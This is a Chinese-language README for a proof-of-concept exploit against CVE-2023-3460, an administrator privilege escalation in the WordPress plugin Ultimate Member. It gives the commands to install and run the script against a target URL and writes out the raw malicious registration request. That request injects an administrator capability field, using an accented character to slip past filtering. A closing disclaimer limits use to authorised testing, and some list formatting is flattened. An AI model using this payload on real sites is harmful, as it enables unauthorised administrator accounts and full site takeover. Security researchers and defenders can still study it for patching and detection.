这是一个针对 CVE-2023-3460 的概念验证 (PoC) 利用程序,该漏洞是 WordPress 插件 Ultimate Member 中的一个严重漏洞。它允许未经身份验证的用户通过构造恶意注册请求将权限提升为管理员。
🔥 影响: 通过创建未经授权的管理员账户实现完全站点沦陷。
requests 库urllib3 库beautifulsoup4 库安装依赖:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce)wp_capabilities 并赋予 administrator 角色POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
此脚本仅用于教育和授权测试目的。未经授权利用系统是非法且不道德的。请仅在您拥有或有权测试的系统上使用。